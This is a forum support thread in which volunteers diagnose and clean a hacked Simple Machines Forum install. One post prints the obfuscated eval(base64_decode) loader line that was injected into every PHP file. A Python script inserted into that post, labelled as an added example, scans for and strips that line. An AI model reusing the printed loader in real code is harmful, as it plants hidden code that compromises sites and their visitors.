
forum not found...

Started by jiajia, December 27, 2010, 12:49:09 AM


jiajia

Just a quick one here, after months of full functioning use the main index of my forum is visible but any attempts to navigate the forum results in a 'this link appears to be broken'.

My old database backups were lost on a broken harddrive so a simple restore is not an option.

Forum is now completely unfunctional. Any simple solutions to this problem?

JBlaze

Jason Clemons
Former Team Member 2009 - 2012

jiajia

Thanks JBlaze ;)

Well I ran the repair_settings php file and the only error I see is that queryless URLS is neither off nor on, stating there is no value found. When I turn them either on or off, then return to the repair_settings page they are both off again with that error message. Am I barking up the wrong tree or is this a likely source of problem? If it is how can I get the damn thing to stay on? All the paths seem to be correct, and all the other settings are set to 'recommended', as well as I checked the SQL database and the result was everything ok. A little confused here.

JimM

Welcome to SMF.

You might want to include a link to your forum so we can take a look at what is happening.
Jim "JimM" Moore
Former Support Specialist

jiajia

http://www.kingsternet.com/forum

Main page works fine, any other pages are unfindable.

JimM

Have a look at your main page by displaying the source.  Did you add all those links at the bottom?  Might not be anything but that looks suspicious to me.

Did this just start to happen?  You mention backups of your database.  Can you verify that the database is intact with phpMyAdmin or something similar?

kat

Hmm... This looks familiar... http://www.simplemachines.org/community/index.php?topic=415151.0

Have a look at index.php. Any one of them.

Is the first line:

<?php

Simply that and nothing else?

If it's that with a load of weird stuff, after it, you have a problem.

JBlaze

Heh. SiteGround. I'm lulzing.

kat


JBlaze

About as good as a midget in a slam dunk contest.

kat

Ah...

Could well be that hack, then.

Uh-oh...

jiajia

So... I'm guessing that's it...

Now, what's the best way to fix it... I know they say every file must be edited, but what is every file? Every PHP file? In the root folder? Or in every folder on the site?

And how can we prevent this in the future? I suspect we are high targets for a repeat attack at some stage.... Something I can take up with siteground?

jiajia

Quote from: K@ on December 31, 2010, 01:54:28 PM

Is the first line:

<?php

Simply that and nothing else?

If it's that with a load of weird stuff, after it, you have a problem.

Hmm, you mean like this?




jiajia

#13
So I've confirmed that's the case... Siteground offers standard malicious code clean up for $99 and advanced code cleanup for $199... I've read the threads on how to deal with it and I'm a bit over my head on this... any cheaper alternatives out there?

Also I've found out it may have attacked through an outdated wordpress on the same website as my SMF, this seems to further complicate matters.

kat

Do you have many mods installed?

If not, you could get the SMF install archive and upload all the files, EXCEPT Settings.php and Install.php, to your site, overwriting what's there, now.

Note that if you have mods, they'll need to be reapplied.

JimM

* JimM wonders why K@ suggested the install package instead of the upgrade package which does not include the Settings.php files.

If everything is uploaded by mistake at least it doesn't wipe out a good settings file! :P

If you know that the attack came from the outdated script, you may be ok just replacing all your files as K@ suggested.  I would at least try that before paying the host to fix it.

kat

I suggested the install, as that contains EVERY PHP file.

Every file is likely to be affected, with this.

At least, on the sites I looked at, they sure were.

At least this one doesn't seem to affect .js files, like the last one did.

JimM

Ahh, but so does the Upgrade package with the exception of the Settings files. :)

kat

I have to confess...

I've never looked at them, that closely, to be honest.

Worth remembering, though, that.

Ta!

jiajia

Just uploading the upgrade package didn't seem to work.

Any new ideas?

Illori

which zip file are you trying to upload and where exactly are you trying to upload it?

kat

You ARE dearchiving the file, before uploading the contents thereof...?

You don't upload the file, as-is.

Illori

well you could upload the zip, then use your cpanel file manager to extract it in place overriding all files, but most people do it like you suggested and upload the extracted files.

kat

I just saw

Quote from: jiajia on January 07, 2011, 09:22:38 AM
Just uploading the upgrade package didn't seem to work.

and assumed he'd uploaded the archive, as-is, and done nothing else.

Some people have to be spoon-fed this stuff. ;)

Illori

i was also thinking they may be trying to upload it to the package manager as well, and depending on the file they downloaded it may not work that way.

kat

Yeah. Sadly, guesswork makes up a lot of what we do, here. ;)

Quite often, we guess right. :)

Sometimes, we don't. :(

NanoSector

#26
EDIT: Whoops didn't know there was a second page ;D

Quote from: Illori on January 07, 2011, 11:40:42 AM
i was also thinking they may be trying to upload it to the package manager as well, and depending on the file they downloaded it may not work that way.
If the user doesn't have access to the forum it's pretty logical they can't upload it to the package manager, no?

I think we should have restore packages for SMF ;)
My Mods / Mod Builder - A tool to easily create mods / Blog
"I've heard from a reliable source that the Answer is 42. But, still no word on what the question is."

jiajia

Yeah, downloaded the smf-1-1-12_upgrade.zip file, dearchived it, then uploaded it. FTP overwrote all the files, but to no avail. Have no access to admin related pages, only repair_settings.php and of course the siteground cpanel.

NanoSector

Quote from: jiajia on January 07, 2011, 05:52:23 PM
Yeah, downloaded the smf-1-1-12_upgrade.zip file, dearchived it, then uploaded it. FTP overwrote all the files, but to no avail. Have no access to admin related pages, only repair_settings.php and of course the siteground cpanel.
A-a-all?!
*shudders*
tell me you didn't overwrite Settings.php!!

jiajia

Quote from: Simple Series team on January 07, 2011, 06:12:18 PM
Quote from: jiajia on January 07, 2011, 05:52:23 PM
Yeah, downloaded the smf-1-1-12_upgrade.zip file, dearchived it, then uploaded it. FTP overwrote all the files, but to no avail. Have no access to admin related pages, only repair_settings.php and of course the siteground cpanel.
A-a-all?!
*shudders*
tell me you didn't overwrite Settings.php!!


Hehe no didn't do that. I edited settings.php to remove the malicious code at the top and then re-uploaded it. Sorry, should have been more specific.

NanoSector

Quote from: jiajia on January 08, 2011, 02:43:14 AM
Quote from: Simple Series team on January 07, 2011, 06:12:18 PM
Quote from: jiajia on January 07, 2011, 05:52:23 PM
Yeah, downloaded the smf-1-1-12_upgrade.zip file, dearchived it, then uploaded it. FTP overwrote all the files, but to no avail. Have no access to admin related pages, only repair_settings.php and of course the siteground cpanel.
A-a-all?!
*shudders*
tell me you didn't overwrite Settings.php!!


Hehe no didn't do that. I edited settings.php to remove the malicious code at the top and then re-uploaded it. Sorry, should have been more specific.
*phew* I was worried lol

kat

If you read this http://www.simplemachines.org/community/index.php?topic=87130.0 and you're OK with it, PM me your FTP details (URL, username, password) and I'll take a look, in case there're other files that the package doesn't have.

Could take me a while, obviously.

JimM

#32
Give us a few more details.  Just saying it doesn't work doesn't give us enough to go on.

ETA:  Disregard.  I didn't read the 2nd page.  I just saw the same comment that K@ did about it not working. :P

kat

It's gonna be an infected file, Jim, I reckon.

One of the mods that were there, perhaps?

JimM

It appears that the forum is in maintenance mode.  The error seems to be something to do with your blog or the integration of WordPress with SMF.

kat

It's as I suspected.

All the files in the custom theme directories were infected. :(

I've cleaned them all out.

Well, I say "All", but I've left some.

In your theme directories, some of the themes have every language file known to man, in there.

Cleaning those out's gonna take me DAYS!

Can you do me a favour?

Can you go to the "languages" directory in the default theme's directory, and delete all the languages that you don't need?

Then, I can just clean-out those that you need.

jiajia

Quote from: K@ on January 09, 2011, 08:53:50 AM
It's as I suspected.

All the files in the custom theme directories were infected. :(

I've cleaned them all out.

Well, I say "All", but I've left some.

In your theme directories, some of the themes have every language file known to man, in there.

Cleaning those out's gonna take me DAYS!

Can you do me a favour?

Can you go to the "languages" directory in the default theme's directory, and delete all the languages that you don't need?

Then, I can just clean-out those that you need.

I'm pretty sure all we need is English.

jiajia

Ok so I saw what you mean, I ended up just deleting many of the themes we never use and just kept two, the default and the ds_natural theme. The default theme was loaded with obscure languages which I trimmed out but why was the language folder in the ds_natural (the boards default theme) empty?

Illori

by default all template files/language files are used from the default theme, so that you don't need to install/copy them to each theme that is used unless they are very different from the default.

kat

OK. I'm just cleaning those, now.

Gimme a while...

kat

#40
OK. To the best of my knowledge, you now have clean files.

First thing to do, I'd suggest, is to BACKUP YOUR FORUM!!

That way, should you get reinfected, you'll have clean files to replace everything with. :)

I notice that you have a directory named "languages.BACKUP". Every single file, in there, is infected.

If you don't need that, just delete the whole directory.

I checked the javascript files, but they don't seem to have been got-at.

Everything SHOULD be OK, now. :)

Might be an idea to let your host know about the infection, too.

This line was added to every php file, as the first line:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2tpbmdzdGVyL3B1YmxpY19odG1sL2Jsb2cvd3AtaW5jbHVkZXMvanMvdGlueW1jZS90aGVtZXMvYWR2YW5jZWQvc2tpbnMvbzJrNy9pbWcvc3R5bGUuY3NzLnBocCc7aWYoZmlsZV9leGlzdHMoJEdMT0JBTFNbJ21mc24nXSkpe2luY2x1ZGVfb25jZSgkR0xPQkFMU1snbWZzbiddKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiZmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe29iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>

I took your site out of Maintenance mode and everything seems OK.
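
A defender-side version of the cleanup described in this post, as an added example that is not part of the original thread or SMF's own code: it finds `.php` files that begin with the injected `eval(base64_decode(...))` line, decodes the payload for inspection without running it, and strips the line after copying the original to a quarantine directory. The function names, the quarantine directory and the sample tree are assumptions constructed for the demo.

```python
import base64
import re
import shutil
import tempfile
from pathlib import Path

# First-line injection as quoted in the post: opening tag, empty comment,
# eval(base64_decode('...')), closing tag, then an optional line break.
INJECTED = re.compile(
    rb"\A<\?php\s*/\*\*/\s*eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\);\s*\?>\r?\n?"
)

def scan(root):
    """Map relative path -> decoded (never executed) payload for each infected .php file."""
    root = Path(root)
    found = {}
    for path in sorted(root.rglob("*.php")):
        m = INJECTED.match(path.read_bytes()) if path.is_file() else None
        if m:
            found[path.relative_to(root).as_posix()] = base64.b64decode(m.group(1))
    return found

def clean(root, quarantine):
    """Copy each infected file to `quarantine` (outside the web root), then strip the prefix."""
    root, quarantine = Path(root), Path(quarantine)
    cleaned = []
    for rel in scan(root):
        src, dst = root / rel, quarantine / rel
        dst.parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(src, dst)
        src.write_bytes(INJECTED.sub(b"", src.read_bytes(), count=1))
        cleaned.append(rel)
    return cleaned

def demo():
    """Constructed sample tree: two infected files, one clean file, one non-PHP file."""
    payload = base64.b64encode(b"/* constructed sample, not real malware */")
    bad = b"<?php /**/eval(base64_decode('" + payload + b"')); ?>"
    with tempfile.TemporaryDirectory() as tmp:
        root, quar = Path(tmp, "forum"), Path(tmp, "quarantine")
        (root / "Themes/default/languages").mkdir(parents=True)
        (root / "index.php").write_bytes(bad + b"<?php\necho 'index';\n")
        (root / "Themes/default/languages/index.english.php").write_bytes(bad + b"\n<?php\n$txt = [];\n")
        (root / "SSI.php").write_bytes(b"<?php\necho 'clean';\n")
        (root / "script.js").write_bytes(bad)  # not scanned: only .php files are checked
        before = sorted(scan(root))
        clean(root, quar)
        return before, sorted(scan(root)), (root / "index.php").read_bytes()

if __name__ == "__main__":
    print(demo())
```

An empty scan only rules out this one variant of the injected line; files that are not in the SMF package, such as custom themes and backup directories, still need comparing against known-good copies.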

jiajia

I can't thank you enough. Made the backup and I'll see how things go. The wordpress blog doesn't seem to be functioning but it should be tame enough. All you did was remove that line at the top from every .php file? I had started doing that, but wasn't seeing any results so I had stopped after like ten...

kat

Yeah, I know the feeling.

Sadly, it's often the way that things can be affected by just one file, even though every other one was clean.

I'd like to meet some of these hackers and get locked in a room, with them...

Script-kiddies with minuscule penises, I reckon, like their Spam friends. ;)

jiajia

There seems to be some sort of issue with submitting data. Everything works, you can click around and read old posts, until you try to login or post.... then it has some sort of error. You'll see what I mean if you try to register...?

kat

No images in CAPTCHA...

Lemme check those.

BRB.

jiajia

Something going on with the uploader as well... I think I may have gone overboard deleting files, but the updater informs me that "The upgrader found some old or outdated language files.

Please make certain you uploaded the new versions of all the files included in the package, even the theme and language files for the default theme.

Click here to try again. "

I re-uploaded a brand spankin' new smf update, uploaded it, and still the same. I'm starting to think hosting a forum wasn't the best idea to volunteer for.

kat

Weirdness...

Your default theme had a billion language DIRECTORIES in its "images" directory, for some reason...

Is this forum relatively new, by any chance?


jiajia

Quote from: K@ on January 10, 2011, 01:01:42 PM
Weirdness...

Your default theme had a billion language DIRECTORIES in its "images" directory, for some reason...

Is this forum relatively new, by any chance?

Define new, it's more than a year old, possibly two...

kat

As you've just backed-up, let me get rid of some stuff that's definitely in the wrong places.

Gimme a while, again...

kat

Can you PM me an admin account access, please?

I can check some other stuff out, then.

kat

Found something... :)

Gimme ten minutes, or so. ;)

jiajia

Quote from: K@ on January 10, 2011, 01:28:17 PM
Found something... :)

Gimme ten minutes, or so. ;)
5....4....3...2....? :P

kat

Everything's clean, but I'm getting session ID hassles, when I try to log in.

I'm trying to figure-out why.
